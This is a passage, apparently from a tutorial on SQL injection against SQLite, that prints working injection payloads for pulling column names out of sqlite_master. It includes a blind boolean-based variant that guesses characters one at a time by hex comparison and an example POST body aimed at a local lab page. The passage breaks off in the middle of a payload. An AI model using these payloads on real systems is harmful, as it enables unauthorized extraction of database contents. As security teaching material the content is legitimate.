hex(substr(replace(replace(replace(replace(replace(replace(replace(replace(repl
ace(replace(replace(substr((substr(sql,instr(sql,'(')%2b1)),instr((substr(sql,instr(s
ql,'(')%2b1)),'`')),"TEXT",''),"INTEGER",''),"AUTOINCREMENT",''),"PRIMA
RY KEY",''),"UNIQUE",''),"NUMERIC",''),"REAL",''),"BLOB",''),"NOT
NULL",''),",",'~~'),"`",""),column-name_character_numer,1))
In above payload, column-name_character_numer represent sequence of
character in column name list. Let’s suppose we want to get the first character
from column name list, just replace column-name_character_numer with
number 1.
In case of blind SQL Injection payload will be as following
and (select
hex(substr(replace(replace(replace(replace(replace(replace(replace(replace(repl
ace(replace(replace(substr((substr(sql,instr(sql,'(')%2b1)),instr((substr(sql,instr(s
ql,'(')%2b1)),'`')),"TEXT",''),"INTEGER",''),"AUTOINCREMENT",''),"PRIMA
RY KEY",''),"UNIQUE",''),"NUMERIC",''),"REAL",''),"BLOB",''),"NOT
NULL",''),",",'~~'),"`",""),1,1)) FROM sqlite_master WHERE type!='meta'
AND sql NOT NULL AND name NOT LIKE 'sqlite_%' and name='info') <
hex('Character_we_are_guessing')
Replace Character_we_are_guessing with character we are guessing, like in
below example, hex(‘q’) shows that we are checking whether first character is
before alphabet ‘q’.
http://127.0.0.1/sqlite-lab/index.php
POST body data
tag=ubuntu' and (select
hex(substr(replace(replace(replace(replace(replace(replace(replace(replace(repl
ace(replace(replace(substr((substr(sql,instr(sql,'(')%2b1)),instr((substr(sql,instr(s